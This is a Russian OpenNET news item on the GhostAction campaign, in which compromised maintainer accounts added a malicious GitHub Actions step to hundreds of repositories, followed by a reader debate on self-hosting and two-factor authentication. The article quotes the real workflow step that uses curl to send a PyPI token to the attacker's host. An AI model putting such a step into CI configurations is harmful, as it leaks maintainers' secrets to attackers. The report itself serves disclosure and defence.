The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

В ходе атаки GhostAction скомпрометировано 817 репозиториев на GitHub

06.09.2025 09:15

Исследователи из компании GitGuardian выявили массовую атаку на пользователей GitHub, в ходе которой был получен контроль над 327 учётными записями и осуществлена подстановка вредоносного обработчика Github Action в 817 репозиториев. Атака привела к утечке 3325 секретов, используемых в системах непрерывной интеграции и передаваемых через переменные окружения, включая токены доступа к PyPI, GitHub, NPM, DockerHub и различным облачным хранилищам.

GitHub Actions даёт возможность разработчикам кода прикреплять обработчики для автоматизации различных операций в GitHub. Например, при помощи GitHub Actions можно выполнить определённые проверки и тесты при совершении коммитов или автоматизировать обработку новых Issues. Вредоносный обработчик распространялся под именем "Github Actions Security" и включал в секции "run" команду "curl", отправляющую содержимое переменных окружения на внешний хост при запуске задач в окружении непрерывной интеграции. Вредоносный коммит добавлялся с учётных записей мэйнтейнеров проектов, которые, вероятно, до этого были взломаны или стали жертвой фишинга.

Атака выявлена после разбора аномальной активности, связанной с пакетом FastUUID, предоставляющим Python-обвязку над Rust-библиотекой UUID. Пакет FastUUID, для которого за последнюю неделю зафиксировано почти 1.2 миллиона загрузок, используется в качестве зависимости в популярном проекте LiteLLM, насчитывающем в PyPI более 5 миллионов загрузок в неделю. Анализ изменений в репозитории FastUUID показал, что 2 сентября мэйнтейнер проекта добавил коммит с новым обработчиком Github Action, в котором содержался код для отправки токена к репозиторию PyPI на внешний хост.


      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}' https://bold-dhawan.45-139-104-115.plesk.page

Проблему удалось выявить до того как злоумышленники воспользовались перехваченным токеном - публикации вредоносных изменений или модифицированных версий пакета в PyPI для FastUUID не зафиксировано. Похожие подстановки Github Action выявлены ещё в 816 репозиториях, владельцам которых, а также администрации PyPI, GitHub, NPM и DockerHub, направлены уведомления. По состоянию на вчерашний вечер вредоносные коммиты были отменены примерно в 100 репозиториях. В настоящее время при поиске в GitHub определяется 671 коммит с вредоносным Github Action.

  1. Главная ссылка к новости (https://blog.gitguardian.com/g...)
  2. OpenNews: Google представил проект OSS Rebuild для выявления скрытых изменений в пакетах
  3. OpenNews: Компрометация GitHub Actions-обработчика changed-files, применяемого в 23 тысячах репозиториев
  4. OpenNews: Ошибка в обработчике GitHub Actions привела к публикации вредоносных релизов Ultralytics
  5. OpenNews: GitHub обновил GPG-ключи из-за уязвимости, приводящей к утечке переменных окружения
  6. OpenNews: Атака на инфраструктуру PyTorch, компрометирующая репозиторий и релизы
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/63831-github
Ключевые слова: github, action
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (76) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.4, Аноним (4), 10:18, 06/09/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • –7 +/
    > GitHub Actions даёт возможность разработчикам кода прикреплять обработчики для автоматизации различных операций в GitHub.

    Как новорится, ССЗБ. Нечего в проприетарном не селфхост облаке хранить критичные данные.

     
     
  • 2.7, Аноним (-), 10:30, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +8 +/
    Дядя Петя, ты дундук? (с)

    >  Вредоносный коммит добавлялся с учётных записей мэйнтейнеров проектов, которые, вероятно, до этого были взломаны или стали жертвой фишинга.

    Что мешает взломать твое не проприетарное селфхостед облако?
    Если ты им пользуешься сам, то может тебе хватит "Новая Папка (1)", "Новая Папка (2)" и тд?
    А если у тебя распределенная команда, то вероятность того что их взломают, не меньше гита.

     
     
  • 3.26, Аноним (26), 14:33, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    >"Новая Папка (1)", "Новая Папка (2)" и тд

    А что, на self hosted запрещается использовать git daemon?

     
  • 3.31, КО (?), 15:30, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Отсутствие неподконтрольного тебе обработчика
     
  • 3.38, ffirefox (?), 16:52, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Если команда небольшая удобнее просто использовать Fossil вместо папок.
    GitHub всё больше в помойку превращается. Большинство реп никому не нужны кроме хозяина. А с приходом ИИ всё становится ещё печальней.
     
  • 2.22, Анон666 (?), 12:21, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Угу, отрвился хлебом - пеки сам
     

  • 1.6, Андрей (??), 10:25, 06/09/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Никогда такого не было и вот опять ?
     
     
  • 2.8, Аноним (-), 10:33, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +7 +/
    Ага.
    Если учетку мейнтенера сломают, то могут сделать плохие вещи.
    Кто бы мог подумать?!!

    ИЧСХ у "типа конкурентов" гитхаба есть такие же экшены
    docs.gitlab.com/user/project/quick_actions/
    docs.gitea.com/usage/actions/comparison

     
     
  • 3.32, Аноним (32), 15:52, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Gitlab это скорее клон github
    Нормальную конкуренцию может составить radicle.xyz
     
     
  • 4.34, Аноним (-), 15:58, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • –2 +/
    > Нормальную конкуренцию может составить radicle.xyz

    Это ты про п2п штуку для нетакусиков?
    Нормальные люди такой дичью не страдают.
    Ты бы еще даркнет предложил)


     
  • 4.48, Анон666 (?), 17:55, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Что у вас с логикой? Конкуренцию продукту А может составить продукт Б, который лучше удовлетворяет запрос потребителя, либо имеет другие рыночные преимущества.

    То что вы говорите, это _разнообразие_, а не конкуренция.

    По вашей же логике получается, что конкуренцию БМВ и Ауди может составить паровой автомобиль.

     

  • 1.9, Tron is Whistling (?), 10:33, 06/09/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Системы непрерывной интеграции троянов всё заинтегрировали нормально.
     
     
  • 2.11, Аноним (-), 10:38, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Ваши предложения?
    Передевать код на дискетках как диды?
    Кричать "вася не трогай файл N я туда сейчас буду изменения заливать!"?
    Не делать автотесты перед мерджом?
     
     
  • 3.12, 27730 (?), 10:43, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    да лучше на дискетах, сто процентов безопасно
     
     
  • 4.16, Аноним (16), 11:29, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Особенно, если она размагнитится по пути.
     
     
  • 5.18, Да ну нах (?), 11:42, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Два чая этому господину!
     
  • 5.30, Ананоним (?), 15:09, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Мои дискеты не размагнитились за 35 лет. Что у тебя там за путь или дискеты?
     
     
  • 6.35, Эксконтрибутор FreeBSD (?), 16:13, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Сказочник, блин
    Даже для того, что бы донести из дома до универа писали минимум на две дискеты, потому что одна вполне может размагнитится даже за время пути из дома в универ. А у тебя якобы за 35 лет нифига
    Ну, то есть я тебе верю. У тебя нет ни одной дискеты и потому ни одна не размагнитилась
     
     
  • 7.40, Ананоним (?), 17:07, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Твоя сказка про твои дискеты и путь выглядит для меня как "купил колонки в магазине за 100500 денех, пока нёс до дома, магниты в динамиках размагнитились". :D Если то не понимаешь что такое "размагнитились" или от чего реальное размагничивание происходит, то ты ССЗБ.
     
     
  • 8.41, Эксконтрибутор FreeBSD (?), 17:13, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Знаешь в чем твоя проблема У тебя не было дискет, ты в те времена еще не родилс... текст свёрнут, показать
     
     
  • 9.42, Ананоним (?), 17:30, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • –3 +/
    Ты так уверен, что я подозреваю что у тебя стойкие галлюцинации ... текст свёрнут, показать
     
  • 5.49, Аноним (49), 18:10, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Размагнитится - вряд ли. А вот сектора у трёхдюймовок бились только в путь.
     
  • 4.33, Аноним (32), 15:55, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Кстати был случай, у нас упал интернет и мы пушили на флешку (file:// протокол) и пулились оттуда :)
     
     
  • 5.75, 0xdeadbee (?), 07:19, 07/09/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    это понятно, "голь на выдумки хитра и эту страну не победить". хехе.
    попробуйте посчитать убытки от торможения бизнес-процессов,
    и сопоставить их с расходми на

    1) у провайдера взять /29

    2) второй канал, второй провайдер, тоже /29.
    100 Mbit/sec достаточно. даже 32 Mbit/sec достаточно.

    3) настроить два фаерволла с SNAT, чтобы каждый был постоянно подключен
    к двум провайдерам, умел определять состояние каналов, балансировать исходящий траф
    и выводить дохлый канал из работы.

     
     
  • 6.81, Аноним (81), 11:05, 07/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > настроить два фаерволла

    щас он спросит у чатгпт, как настроить сдван :)

     
     
  • 7.89, 0xdeadbee (-), 18:23, 07/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    а правда что на каждый SDWAN накладывается обременение в виде vendor lock ?
     
  • 6.83, mickvav (?), 14:27, 07/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Если бизнес-процесс - два студента, пилящих курсач - флешка и file:// протокол вполне себе норм решение, если сети _вообще_ нет. Да, потеряется час-два времени недоджунов за неделю работы. Не критично.

    Если есть хотя бы ethernet - то кабель между компами + статические айпишники + ssh протокол уже уделают флешку натаком проекте.

    Ваши /28 + второй канал + настройка всего этого осмысленны если это _бизнес_ проект с продолжительностью больше месяца И своей физической инфраструктурой. Если инфраструктура в облаке - то нафига вот-это-все, если при отрубании интернета в офисе каждый за пару минут раздает себе интернетик с телефончика? Ну разве что у вас офис на 1000 человек и интернетики с телефончиков перегружают сотового оператора и все лежит...

     
     
  • 7.88, 0xdeadbee (-), 18:18, 07/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > Если бизнес-процесс - два студента, пилящих курсач

    ок. но все же дождемся ответа анона, который пушил через флэшку.

    > Ваши /28 + второй канал + настройка всего этого осмысленны если это

    /28 - оверкилл и оверпрайс. /29 достаточно для разумных применений.

    > _бизнес_ проект с продолжительностью больше месяца И своей физической инфраструктурой.
    > Если инфраструктура в облаке - то нафига вот-это-все,

    для фанатов облаков приготовлен отдельный филиал ИТшного ада.
    надеюсь, кое-кто (из МТС облаков например) уже там.

    кстати для фанатов циски и микротиков - тоже.

    > при отрубании
    > интернета в офисе каждый за пару минут раздает себе интернетик с
    > телефончика

    1) спрашивается - почему они изначально не раздавали сами себе ?
    и перенастраивать ничего не надо.

    2) с мобильными интернетами в некоторых местах этой страны сейчас проблемы.
    фанаты облаков отрываются от земли и витают в облаках, как обычно.

     
  • 3.14, localhostadmin (ok), 10:46, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Зачем до каменного века скатываться? Может достаточно просто не доверять свою чувствительную инфу сомнительным людям?
     
     
  • 4.15, Аноним (-), 10:51, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Сомнительные люди тут кто?
    Мейнтенеры, учетки которых взломали?
    Значит надо обходиться без мейнтенеров и писать все в одну персону.
    А чтобы твою учетку тоже не взломали, не доверять код интернету, и хранить его на подкроватном сервере.
     
     
  • 5.19, localhostadmin (ok), 11:52, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • –2 +/
    >> Сомнительные люди тут кто?

    Ты хоть новость читал? Очевидно, что разрабы Github Actions Security

     
     
  • 6.20, Ангним (?), 12:02, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Разрабы GitHub actions security просто добавили отправку секретов на деревню дедушке. А вот сам этот экшен добавляли сломанные учётки мэинтейнеров.
     
  • 6.28, PROgrm_JARvis (ok), 14:44, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > разрабы Github Actions Security

    Нет никакого Github Actions Security, там злоумышленники тупо стадию пайплайна так назвали.

     
     
  • 7.29, Аноним (-), 14:49, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +10 +/
    Но зачем в это углубляться?
    Увидели название гитхаб, вспомнили что ими владеют майкрософт...
    Всё этого достаточно чтобы полторы извилины уже отключились, во рту начала собираться пена и с праведным гневом пошли писать глупые комментарии.
     
  • 3.17, Tron is Whistling (?), 11:34, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Никаких предложений: говорю ж - нормально всё заинтегрировали, очень удобная штука.
     

  • 1.21, Аноним (21), 12:10, 06/09/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Скажите, а мой репозиторий не скомпрометировали? Как проверить?
     
  • 1.36, Anonymus (?), 16:43, 06/09/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    >Вредоносный коммит добавлялся с учётных записей мэйнтейнеров проектов, которые, вероятно, до этого были взломаны или стали жертвой фишинга.

    А что, двухфакторная авторизация не помогла?

     
     
  • 2.39, Tron is Whistling (?), 17:00, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    В том виде, в котором она сейчас реализуется, двухфакторка - это лютый энной. Поэтому принужденные к этой фигне реально будут хранить оба фактора в одном менеджере паролей и вкопировать не глядя.
     
     
  • 3.43, Аноним (43), 17:36, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > хранить оба фактора в одном менеджере паролей

    Чел, второй фактор - это отдельный девайс.

    > В том виде, в котором она сейчас реализуется

    По твоему заявлению выше очевидно, ты не понимаешь, как она реализуется.

     
     
  • 4.44, Аноним (44), 17:43, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    ты и не понимаешь. Тотп и все там
     
  • 4.47, Аноним (47), 17:53, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Что пароль что второй фактор OTP храню в Keepass. На одном устройстве. В одном приложении. Удобно. Были бы дешёвые физические устройства для OTP пользовался бы ими
     
     
  • 5.51, Аноним (-), 18:26, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > Что пароль что второй фактор OTP храню в Keepass. На одном устройстве. В одном приложении. Удобно.

    Но весьма уменьшает безопасность.

    > Были бы дешёвые физические устройства для OTP пользовался бы ими

    От 50 баксов до ...
    Неужели дорого?


     
  • 5.54, Аноним (43), 18:45, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > Что пароль что второй фактор OTP храню [...] На одном устройстве.

    Все стараются увеличить безопасность, но наш брат непобедим!

    > Что пароль что второй фактор OTP храню в Keepass. На одном устройстве.

    У тебя уже есть мобильный смартфон.

     
     
  • 6.68, Аноним (49), 21:36, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • –2 +/
    > стараются увеличить безопасность

    Как TOTP увеличит безопасность?
    Если пароль утек с сервера, то утечет и секрет. Через ту же дыру.
    Если пароль утек у пользователя, то утечет и секрет. У того же балбеса.
    Был бы смысл, если бы секрет был ассиметричный. Но симметричный секрет не даёт ничего. Это просто благовидный повод привязать девайс, чтобы деанонимизировать пользователя.

     
     
  • 7.72, Аноним (43), 22:34, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > Если пароль утек у пользователя, то утечет и секрет.

    Нет. Оба утекут только у тех, кто хранит их на одном устройстве. Что непонятного?

    > Но симметричный секрет не даёт ничего.

    Если человек упрям, как баран, то объяснять что-либо бесполезно.

    > Это просто благовидный повод привязать девайс, чтобы деанонимизировать пользователя.

    А, ну понятно: ты из той секты параноиков, у кого TOPT что-то там деанонимизирует.

     
     
  • 8.77, Аноним (77), 08:51, 07/09/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Так все хранят Только я - в зашифрованной базе KPXC, и браузер в песочнице А т... текст свёрнут, показать
     
     
  • 9.84, Аноним (43), 15:03, 07/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Нет, только альтернативно одаренные, которые не понимают, у чем суть двуфакторки... большой текст свёрнут, показать
     
  • 6.76, нейм (?), 07:49, 07/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > Все стараются увеличить безопасность, но наш брат непобедим!

    И сейчас ты конечно принесешь в описание такой вектор атаки, который унизительно легок в выполнении и стоимость его настолько низка на любых вариантах АПК, что именно наличие второго отдельного устройства (а точнее смартфона, раз ты на него так запал) требуется для всех пользователей. Под любыми вариантами АПК в том числе понимаются такие, где база кипаса с тотп лежит на шифрованном диске (бэкапы шифрованы тоже)

    Ну и да, расскажи как на безопасность влияют в мобильных тотп мейнстримных аппах: облачная синхронизация (гугол) и санкции на учетки по причине страны (мс аутх, который еще и к гитхабу ао конторе близок).

     
     
  • 7.86, Аноним (43), 15:24, 07/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Конечно приведу у тебя сперли один фактор пароль ломанули телефон , но второй ... большой текст свёрнут, показать
     
  • 4.52, Аноним (49), 18:28, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > второй фактор - это отдельный девайс

    Это в HOTP требуется синхронизация счётчика (C) между клиентом и сервером. (https://www.rfc-editor.org/rfc/rfc4226#section-5)
    В TOTP для счётчика используется общеизвестное синхронизированное время. Достаточно хранить секрет (K), и одноразовый пароль можно вычислить независимо. (https://www.rfc-editor.org/rfc/rfc6238#section-4)

     
     
  • 5.55, Аноним (43), 18:50, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Круть! Но это все как-то противоречит тому факту, что в двуфакторке вторым фактором является отдельный девайс?
     
     
  • 6.56, Аноним (49), 19:03, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    В вебе, в двухфакторках используется TOTP. При регистрации/настройке передаётся секрет, из которого с помощью общеизвестного алгоритма и общеизвестного времени получают временный код. Например, в менеджере паролей, вроде KeePassXC. Девайс не нужен.
    Даже если девайс типа "требуется" (например, как в Steam), код можно получить без него. Там другой, но также известный алгоритм (в KPXC есть из коробки). Valve просто привязку телефона у вас так беззастенчиво выпрашивает.
     
     
  • 7.57, Аноним (49), 19:07, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    https://github.com/keepassxreboot/keepassxc/pull/1206
     
  • 7.63, Аноним (43), 20:50, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > Девайс не нужен.

    Ты вообще не понял, о чем я тебе говорю. Ну валяй - делай из двуфакторки однофакторку, храня все в одной корзине (своем KeePassXC, например).

     
     
  • 8.66, Tron is Whistling (?), 20:57, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Да не помогут тебе даже две корзины, если на той стороне - фишинговый ресурс, на... текст свёрнут, показать
     
  • 8.67, Аноним (49), 21:27, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Ну валяй, подключай к Стиму телефон Только и пароль куки, и TOTP-секрет будут н... текст свёрнут, показать
     
     
  • 9.73, Аноним (43), 22:37, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Ты адекватный вообще Я тебе в третий раз повторяю смысл 2FA в том, чтобы НЕ хр... текст свёрнут, показать
     
     
  • 10.78, Аноним (77), 09:03, 07/09/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Мало кто предлагает 2FA Например, второй пароль, который явно более надежен, че... текст свёрнут, показать
     
     
  • 11.85, Аноним (43), 15:14, 07/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Ты сам себе противоречишь TOTP на втором девайсе - это и есть второй фактор Чи... большой текст свёрнут, показать
     
  • 10.82, Аноним (81), 11:11, 07/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    идея второго фактора в интернете безполезна, куда безопаснее записанный на бумаж... текст свёрнут, показать
     
  • 4.62, Tron is Whistling (?), 20:47, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    >> хранить оба фактора в одном менеджере паролей
    > Чел, второй фактор - это отдельный девайс.

    Бгг, ты просто пользователей не видел :D

     
  • 3.46, Аноним (46), 17:50, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    «Принужденные» всегда при любых условиях будут делать всё, что угодно, лишь бы саботировать принуждателя. Без исключений. Но даже в этом случае не вижу проблемы для конечного пользователя. Хороший менеджер паролей заполнит все поля сам, даже копировать не надо — считай, чуть лучше одинакового пароля на всех ресурсах. Для тех, кому 2fa не жмёт и кто понимает как им пользоваться не жертвуя удобством тоже всё хорошо. Недовольно бухтят только опеннетчики, что тоже хорошо — можно почитать комментарии и в очередной раз убедиться, что без работы на ближайшие 50 лет не останусь. Сплошная благодать. Омммммммм…
     
     
  • 4.64, Tron is Whistling (?), 20:55, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Я не зря написал - "в том виде, в котором оно сейчас строится".

    Вообще там, где надо, есть даже многофакторка - например три человека из группы в пять. При этом каждый со своим брелком с неизвлекаемым приватным ключом и пином к этому брелку, которого именно имеющий брелок - не знает.

    Но вот TOTP "в текущем виде", например так, как для пользователей разных гитшляп, особенно с переавторизацией каждый час - это тупой энной и провокация. Его будут сейвить в один KeePass рядом с паролем и копипастить. Или читать с брелка - и набивать в общий кейлоггер не глядя.

     
     
  • 5.65, Tron is Whistling (?), 20:56, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    То есть не провокация, а профанация, простите.
     
  • 5.74, Аноним (46), 05:48, 07/09/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > переавторизацией каждый час

    Проблемы страны вечных NATов.

    Откровения про шамира и сколько паролей автоматически вводит keepass читать лень. Ещё раз: кому надо пользуется как надо, за остальных 1Password всё делает что так, что эдак. Не работает эта схема только у людей без интернета и мамкиных борцунов со слежкой инопланетянами, накрутивших uMatrix. Других причин пока обнаружено не было.

     

  • 1.45, Аноним (45), 17:49, 06/09/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Всё правильно сделал Он же не бесплатно эту библиотеку разрабатывал Лицензия я... большой текст свёрнут, показать
     
     
  • 2.50, Аноним (49), 18:20, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Ст. 273 УК РФ
     
     
  • 3.53, Эксконтрибутор FreeBSD (?), 18:29, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    И какое отношение понятия папуасов имеют к серверам Github?
     
     
  • 4.58, Аноним (49), 19:14, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    А ты сам-то с какого раёна будешь?
     
  • 3.59, Аноним (59), 19:20, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Это неприменимо принимая лицензию на программу включая зависимые библиотеки в... большой текст свёрнут, показать
     
     
  • 4.60, Аноним (49), 19:30, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > принимая лицензию на программу

    У УК приоритет выше.

    > бинарь rm

    Сам себя не запустит. И делает ровно то, о чём заявляет.

    > Разрабы fastbullshit

    Незаявленное поведение, причиненный вред, злой умысел. Для возбуждения только заявления не хватает.

     
     
  • 5.69, Аноним (69), 22:26, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Что же тогда Bear не сидят поголовно, не видим массовых судов над ними Та л... большой текст свёрнут, показать
     
     
  • 6.79, Аноним (77), 09:31, 07/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > Что же тогда "* Bear" не сидят поголовно, не видим массовых судов над ними?

    Потому что никто не призвал их к ответу? Потому что все малодушно и трусливо считают, что они зрители в кинотеатре, а не полноправные участники общественной жизни? См. "Общество спектакля" и прочую философию.

    > Та либа тоже сама себя не запустит, её ручками в проект притащили.

    Код отправки подстановлен после.

    > Что же всех этих копирастов и пособников до сих пор не посадили?

    См. ответ на первый вопрос. Плюс, "копирасты" зарабатывают деньги (идол) и делятся ими с "крышей" (налоги). Это называется "буржуазное государство" или "диктатура буржуазии". За ликбез не благодари, пользы от тебя всё равно никому не будет.

     
     
  • 7.87, Аноним (87), 17:53, 07/09/2025 Скрыто ботом-модератором     [к модератору]
  • +/
     
  • 4.61, Аноним (61), 19:51, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > "Разрабы"

    Разработчики обязаны соблюдать законы нашей Вилкой страны! Вы согласны в этом, или нет?
    Даже в том случаи, если просто выложил открытый код, разраб должен нести полную ответственность (в том числе и уголовную) за свой код!
    А если разработчик находится в другой стране, то он должен быть экстрадирован к нам для суда!

     

  • 1.70, Аноним (69), 22:29, 06/09/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    >связанной с пакетом FastUUID, предоставляющем Python-обвязку над Rust-библиотекой UUID

    Они там с ума посходили? UUID v4 - случайный, для его генерации библиотека, тем более на Rust, не нужна, а для никаких других UUIDов в принципе нет легитимного применения.

     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2025 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру